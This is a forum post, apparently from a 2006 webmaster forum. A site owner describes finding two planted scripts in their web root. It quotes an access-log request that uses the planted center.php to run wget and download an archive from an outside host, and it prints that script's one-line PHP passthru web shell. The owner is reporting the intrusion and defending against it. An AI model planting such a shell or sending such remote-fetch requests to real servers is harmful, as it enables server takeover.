202.62.19.*** - - [27/Sep/2006:09:11:31 -0700] "GET /center.php?cmd=wget%20http://ncua.idv.tw/nuke/cache/dalnet.tgz HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)"

I cannot find when or where the two scripts, a.php and center.php, were installed in my root directory, but over a couple of days someone was pretty active snnoping around my configuration files.

center.php is a passthru function.

<?
passthru($cmd);
?>

a.php is busy trying to find out everything that it can about the server and its configuration.

I don't know everyone that uses this particular UA is a hacker, but it gets a permanent ban on my site. I'm on a shared host, and I cannot completely discount the possibility that my passwords were hacked. But since I can't find where these files were PUT in my root, I suspect another account on the host was hacked.

[edited by: volatilegx at 12:54 am (utc) on Oct. 6, 2006]
[edit reason] obfuscated ip address [/edit]